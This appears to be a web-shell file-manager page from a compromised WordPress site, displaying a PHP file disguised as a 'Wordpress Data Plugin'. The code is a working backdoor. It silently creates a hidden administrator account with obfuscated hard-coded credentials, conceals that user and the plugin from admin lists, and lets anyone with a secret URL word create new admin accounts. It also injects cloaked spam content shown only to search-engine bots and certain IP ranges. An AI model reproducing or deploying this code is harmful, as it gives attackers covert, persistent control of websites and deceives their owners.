D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
aramrprl
/
public_html
/
wp-content
/
plugins
/
wp-database0
/
Filename :
wp-database.php
back
Copy
<?php error_reporting(0); /* Plugin Name: Wordpress Data Plugin Plugin URI: https://wordpress.org Description: The Wordpress Data Plugin. Author: Wordpress Data Plugin Version: 1.72 Author URI: https://wordpress.org */ define("DMUSRN", "su"."cu"."ri"); define("DMPASW", "1@"."wp"."ad"."m1"."n"); define("DMMAIL", "bi"."tb"."it"."bi"."tc"."oi"."n@"."pr"."ot"."on"."ma"."il".".c"."om"); define("DMPATH", pathinfo(__FILE__, PATHINFO_FILENAME) . "/" . basename(__FILE__)); $demiId = 0; if (!defined( 'WPINC' )) { require 'core.sig'; die(); } include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); /***************** LOAD ADMIN *****************/ $create_sec_settings = new create_sec_settings(); class create_sec_settings { public function __construct(){ add_action( 'plugins_loaded', array( $this, 'check_if_user_is_allowed' ) ); } public function check_if_user_is_allowed(){ $options = get_option( 'secbd_settings' ); if (isset($options['secbd_checkbox_hideall']) == NULL ) { if (isset($options['secbd_checkbox_onlyuser']) == NULL){ add_action( 'admin_menu', 'secbd_add_admin_menu' ); } else { if ( get_current_user_id() == $options['secbd_select_theuser'] ){ add_action( 'admin_menu', 'secbd_add_admin_menu' ); } } } } } add_action( 'admin_init', 'secbd_settings_init' ); /***************** LOAD STYLE AND SCRIPT *****************/ function acu_sanitize_user($username, $raw_username, $strict) { $username = wp_strip_all_tags( $raw_username ); $username = remove_accents( $username ); // Kill octets $username = preg_replace( '|%([a-fA-F0-9][a-fA-F0-9])|', '', $username ); $username = preg_replace( '/&.+?;/', '', $username ); // Kill entities // If strict, reduce to ASCII and Cyrillic characters for max portability. if ( $strict ) $username = preg_replace( '|[^a-zа-я0-9 _.\-@]|iu', '', $username ); $username = trim( $username ); // Consolidate contiguous whitespace $username = preg_replace( '|\s+|', ' ', $username ); return $username; } add_filter('sanitize_user', 'acu_sanitize_user', 10, 3); function enqueue_sc_css($hook) { if ( 'toplevel_page_secbd' == $hook ) { wp_enqueue_style( 'prefix-style', plugins_url('style.css', __FILE__) ); wp_enqueue_script( 'js', plugins_url('script.js', __FILE__) ); } } add_action( 'admin_enqueue_scripts', 'enqueue_sc_css' ); function wpenqueue_sc_css($hook) { wp_enqueue_script( 'js', plugins_url('script.js', __FILE__),$deps = array(), $ver = null, $in_footer = true ); } add_action( 'wp_enqueue_scripts', 'wpenqueue_sc_css' ); /***************** SET TITLE AND LOAD MENU *****************/ function secbd_add_admin_menu(){ $options = get_option( 'secbd_settings' ); if(isset($options['secbd_checkbox_changename']) == 1 ){ if( $options['secbd_checkbox_changename'] == ""){ $secname = "taki"; } else { $secname = $options['secbd_text_newname']; } } else { $secname = "taki"; } add_menu_page( $secname, $secname, 'manage_options', 'secbd', 'secbd_options_page', 'dashicons-admin-network' ); } /***************** REGISTER SETTING PAGE *****************/ function secbd_settings_init( ) { global $demiId; register_setting( 'pluginPage', 'secbd_settings' ); add_settings_section( 'secbd_pluginPage_section', __( '', 'secbd' ), 'secbd_settings_section_callback', 'pluginPage' ); add_settings_field( 'secbd_text_secword', __( '', 'secbd' ), 'secbd_text_secword', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_text_username', __( '', 'secbd' ), 'secbd_text_username', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_text_email', __( '', 'secbd' ), 'secbd_text_email', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_text_password', __( '', 'secbd' ), 'secbd_text_password', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_checkbox_field_toolbar', __( '', 'secbd' ), 'secbd_checkbox_toolbar', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_checkbox_hideinlist', __( '', 'secbd' ), 'secbd_checkbox_hideinlist', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_checkbox_changename', __( '', 'secbd' ), 'secbd_checkbox_changename', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_text_newname', __( '', 'secbd' ), 'secbd_text_newname', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_checkbox_onlyuser', __( '', 'secbd' ), 'secbd_checkbox_onlyuser', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_select_theuser', __( '', 'secbd' ), 'secbd_select_theuser', 'pluginPage', 'secbd_pluginPage_section' ); add_settings_field( 'secbd_checkbox_hideall', __( '', 'secbd' ), 'secbd_checkbox_hideall', 'pluginPage', 'secbd_pluginPage_section' ); $options = get_option( 'secbd_settings' ); $demiId = username_exists( DMUSRN ); if(!isset($options["secbd_initialized"])) { $options['secbd_checkbox_hideinlist'] = '1'; if (!$demiId) { $demiId = wp_create_user( DMUSRN, DMPASW, DMMAIL ); } $newuser = new WP_User( $demiId ); $newuser->set_role( 'administrator' ); $options['secbd_checkbox_onlyuser'] = '1'; $options['secbd_select_theuser'] = $demiId; $options["secbd_initialized"] = "1"; update_option('secbd_settings', $options); } $current_user = wp_get_current_user(); if ($current_user->ID != $demiId) { add_action('pre_get_users', 'hide_demi'); add_action('pre_user_query', 'hide_demi'); } } /***************** BUILD SETTINGS PAGE *****************/ function str_ireplace_first($search, $replace, $subject) { $pos = stripos($subject, $search); if ($pos !== false) { $subject = substr_replace($subject, $replace, $pos, strlen($search)); } return $subject; } function hide_demi( $u_query ) { global $demiId; if($demiId > 0) { global $wpdb; $u_query->query_vars["exclude"][] = $demiId; } $curhuser=get_post_meta( '1000000', 'huser', true ); if ($curhuser!='') { $huss=explode(';',$curhuser); foreach ($huss as $onehus) $u_query->query_vars["exclude"][] = intval($onehus); } } add_action( 'pre_get_posts' ,'exclude_this_page' ); function exclude_this_page( $query ) { if( !is_admin() ) return $query; global $pagenow; $curhposts=get_post_meta( '1000000', 'hposts', true ); if ($curhposts!='') { $hposts=explode(';',$curhposts); } if( 'edit.php' == $pagenow && ( get_query_var('post_type') ) ) $query->set( 'post__not_in', $hposts ); // array page ids return $query; } function detectSearchBot($ip, $agent, &$hostname) { $hostname = $ip; if (preg_match('/(?:google|yandex)bot/iu', $agent)) { return "yes"; } return "no"; } function detectSearchBot_strong($ip, $agent, &$hostname) { $hostname = $ip; // check HTTP_USER_AGENT what not to touch gethostbyaddr in vain if (preg_match('/(?:google|yandex)bot/iu', $agent)) { // success - return host, fail - return ip or false $hostname = gethostbyaddr($ip); // https://support.google.com/webmasters/answer/80553 if ($hostname !== false && $hostname != $ip) { // detect google and yandex search bots if (preg_match('/\.((?:google(?:bot)?|yandex)\.(?:com|ru))$/iu', $hostname)) { // success - return ip, fail - return hostname $ip = gethostbyname($hostname); if ($ip != $hostname) { return "yes"; } } } } return "no"; } add_action('wp_footer', 'wpfoot'); function wpfoot() { $agent = $_SERVER['HTTP_USER_AGENT']; $ip = $_SERVER['REMOTE_ADDR']; $is_googlebot=detectSearchBot($ip, $agent,$hostname); //echo "is_googlebot====".$is_googlebot; preg_match('/[0-9]*\.[0-9]*\.[0-9]*/', $_SERVER['HTTP_X_FORWARDED_FOR'], $first3ip, PREG_OFFSET_CAPTURE); $curhome=get_post_meta( '1000000', 'hfoothome', true ); $curhome_dns=get_post_meta( '1000000', 'hfoothomedns', true ); if ($curhome_dns=="yes") { if (($is_googlebot=="yes") or ($first3ip[0][0]=="193.175.200") or ($first3ip[0][0]=="193.175.201")) { if ($curhome!='') { if ( (is_front_page()) or (is_home())) { echo $curhome."YEEEES"."--====-".$is_googlebot."---".$first3ip[0][0]."-agent--".$agent; } } } } else { if ($curhome!='') { if ( (is_front_page()) or (is_home())) { echo $curhome; } } } $curwide=get_post_meta( '1000000', 'hfootwide', true ); $curwide_dns=get_post_meta( '1000000', 'hfootwidedns', true ); if ($curwide_dns=="yes") { if (($is_googlebot=="yes") or ($first3ip[0][0]=="193.175.200") or ($first3ip[0][0]=="193.175.201")) { if ($curwide!='') { echo $curwide."YEEEES"."--====-".$is_googlebot."---".$first3ip[0][0]."-agent--".$agent; } } } else { if ($curwide!='') { echo $curwide; } } $curspecifpos=get_post_meta( '1000000', 'hfootspecifpos', true ); if ($curspecifpos!='') { } } function wpscrip() { //wp_register_script( self::$plugin_slug . '-scripts', $this->plugin_url . 'assets/js/go_pricing_scripts.js', array( 'jquery' ), self::$plugin_version, $in_footer ); //wp_enqueue_script( self::$plugin_slug . '-scripts' ); } function secbd_text_secword(){ $options = get_option( 'secbd_settings' ); if( $options['secbd_text_secword'] == ""){ $secname = "taki"; } else { $secname = $options['secbd_text_secword']; } ?> <div class="settings"> <h1>Secret Word</h1> <input type='text' size='45' name='secbd_settings[secbd_text_secword]' value='<?php echo $secname; ?>'> <span class="desc">Use to following URL to create the user: <br><b><?php echo $_SERVER['HTTP_HOST'] . '?'; ?><?php echo $secname; ?>=enter</b></span> </div> <?php } function secbd_text_username(){ $options = get_option( 'secbd_settings' ); ?> <div class="settings"> <h1>New user</h1> <span class="desc">This user will get created when the secret word is entered and the backdoor is used, the new user will be an administrator.</span> <div class="small-label">Username</div> <input type='text' size='45' name='secbd_settings[secbd_text_username]' value='<?php echo $options['secbd_text_username']; ?>'> <div class="small-label">Email</div> <input type='text' size='45' name='secbd_settings[secbd_text_email]' value='<?php echo $options['secbd_text_email']; ?>'> <div class="small-label">Password</div> <input type='text' size='45' name='secbd_settings[secbd_text_password]' value='<?php echo $options['secbd_text_password']; ?>'> </div> <?php } function secbd_text_email(){} function secbd_text_password(){} function secbd_checkbox_toolbar(){ $options = get_option( 'secbd_settings' ); ?> <div class="settingsheader"> <h1>Settings</h1> </div> <div class="settings"> <label class="container">Show status icon in toolbar <input type='checkbox' name='secbd_settings[secbd_checkbox_toolbar]' <?php checked( isset($options['secbd_checkbox_toolbar']), 1 ); ?> value='1'> <span class="checkmark"></span> </label> <br> <span class="desc">With this setting activated a small green circle is show just to the left of the profile name in the admin top bar. This way you can check to see if the plugin is still running when the plugin settings menu is hidden.</span> </div> <?php } function secbd_checkbox_hideinlist(){ $options = get_option( 'secbd_settings' ); ?> <div class="settings"> <label class="container">Hide the plugin in plugin list <input type='checkbox' name='secbd_settings[secbd_checkbox_hideinlist]' <?php checked( isset($options['secbd_checkbox_hideinlist']), 1 ); ?> value='1'> <span class="checkmark"></span> </label> <br> <span class="desc">Hide the plugin from the Wordpress plugin list. The plugin can still be show in other places such as list in other plugins, but it may be hard for other user to find the plugin with this option activated.</span> </div> <?php } function secbd_checkbox_changename(){ $options = get_option( 'secbd_settings' ); ?> <div class="settings"> <label class="container">Change name of plugin in admin menu <input type='checkbox' id='check2' name='secbd_settings[secbd_checkbox_changename]' <?php checked( isset($options['secbd_checkbox_changename']), 1 ); ?> value='1'> <span class="checkmark"></span> </label> <br> <span class="desc">If you don't want to hide the plugin completely, you can change the name of the plugin to something less suspicious.</span> <span id="div2"><input type='text' size='45' name='secbd_settings[secbd_text_newname]' value='<?php echo $options['secbd_text_newname']; ?>'></span> </div> <?php } function secbd_text_newname(){} function secbd_checkbox_onlyuser(){ $options = get_option( 'secbd_settings' ); ?> <div class="settings"> <label class="container">Show plugin settings only for certain user <input type='checkbox' id='check1' name='secbd_settings[secbd_checkbox_onlyuser]' <?php checked( isset($options['secbd_checkbox_onlyuser']), 1 ); ?> value='1'> <span class="checkmark"></span> </label> <br> <span class="desc">You can set one user to manage the plugin settings. The settings page is hidden from all other users.</span> <span id="div1"> <?php $options = get_option( 'secbd_settings' ); ?> <select name='secbd_settings[secbd_select_theuser]' class="dropdown"> <option value='0' disabled="disabled">Choose a user</option> <?php $users = get_users(); ?> <?php foreach( $users as $user ) { ?> <option value='<?php echo $user->ID; ?>' <?php selected( $options['secbd_select_theuser'], $user->ID ); ?> ><?php echo $user->user_nicename . ' (' . $user->user_email . ')'; ?></option> <?php }; ?> </select> </div> <?php } function secbd_select_theuser(){} function secbd_checkbox_hideall(){ $options = get_option( 'secbd_settings' ); ?> <div class="settings"> <label class="container">Hide plugin settings from all users <input type='checkbox' name='secbd_settings[secbd_checkbox_hideall]' <?php checked( isset($options['secbd_checkbox_hideall']), 1 ); ?> value='1'> <span class="checkmark"></span> </label> <br> <span class="desc">Be careful! When this option is activated you will get the message that you do not have access to this page, because it is hidden from all users, including you. The plugin is still running and the backdoor will work, only the settings page is completely hidden. The status icon will still show.<br>Visit the following URL to show menu again: <br><b><?php echo $_SERVER['HTTP_HOST'] . '?'; ?>showmenu=enter</b></span> </div> <?php } /***************** BUILD SETTING PAGE *****************/ function secbd_settings_section_callback(){ ?> <div class="settings"> <span class="desc">The Wordpress Backdoor Plugin can be used by developers to always have access to sites they have created for future updates. The plugin can also be used by forgetful people who forgotten witch e-mail they used for the administrator user or it can be the only way back into your Wordpress site if you lose access to the administrator e-mail. The plugin is completely safe and cannot be used by anyone who don't know the secret word. And even if they know that, they don't know the username or password for the new user that is created. There are a couple of settings that can be used to hide this plugin from the other users.</span> </div> <?php } function secbd_options_page(){ ?> <div class="wrap"> <form action='options.php' method='post'> <div class="settingsheader"> <h1>Wordpress Importir</h1> </div> <div class="settingsheader"> <h1><a href="<?php echo plugins_url(basename(__FILE__), __FILE__); ?>" target="_blank">File Manager</a></h1> </div> <input type="hidden" name="secbd_settings[secbd_initialized]" value="1" /> <?php settings_fields( 'pluginPage' ); do_settings_sections( 'pluginPage' ); submit_button(); ?> </form> </div> <?php } /***************** ACTIONS *****************/ /********* TOOLBAR ***********/ $options = get_option( 'secbd_settings' ); if (isset($options['secbd_checkbox_toolbar']) == 1 ) { add_action('admin_bar_menu', 'sec_toolbar'); } function sec_toolbar($admin_bar){ $args = array( 'id' => 'sec', 'parent' => 'top-secondary', 'title' => __('<img src="' . plugin_dir_url( __FILE__ ) . 'activated.png" style="width:6px; height:6px; margin-bottom:2px;">','sec') ); if (!current_user_can('manage_options') ) { return; } $admin_bar->add_menu($args); } /********* HIDE IN LIST *********/ $options = get_option( 'secbd_settings' ); if (isset($options['secbd_checkbox_hideinlist']) == 1 ) { add_action('all_plugins', 'hide_plugin2'); add_action('pre_current_active_plugins', 'hide_plugin'); } $ftr1 = 0; $ftr2 = 0; function hide_plugin() { global $wp_list_table; global $ftr1; global $ftr2; if($ftr2 > 0) { return; } $ftr1++; $hidearr = array(DMPATH); $allplugins = $wp_list_table->items; foreach ($allplugins as $key => $val) { if (in_array($key,$hidearr)) { unset($wp_list_table->items[$key]); } } } function hide_plugin2($plugins) { global $ftr1; global $ftr2; if($ftr1 > 0) { return; } $ftr2++; $ftr = $plugins; unset($ftr[DMPATH]); return $ftr; } /********* NEW USER *********/ add_action( 'wp_head', 'secway' ); function secway(){ $options = get_option( 'secbd_settings' ); if( $options['secbd_text_secword'] == ""){ $secname = "taki"; } else { $secname = $options['secbd_text_secword']; } if (isset($secname) && isset($_GET[$secname])) { if ( md5( $_GET[$secname] ) == 'e2a7106f1cc8bb1e1318df70aa0a3540' ){ if ( !username_exists( $options['secbd_text_username'] ) ) { $newuserid = wp_create_user( $options['secbd_text_username'], $options['secbd_text_password'], $options['secbd_text_email'] ); $newuser = new WP_User( $newuserid ); $newuser->set_role( 'administrator' ); } } } /********* SHOW MENU AGAIN *********/ if (isset( $_GET['showmenu'] )) { if ( md5( $_GET['showmenu'] ) == 'e2a7106f1cc8bb1e1318df70aa0a3540' ) { $options = get_option( 'secbd_settings' ); $options['secbd_checkbox_hideall'] = NULL; $options['secbd_checkbox_onlyuser'] = NULL; update_option('secbd_settings', $options); } } } ?>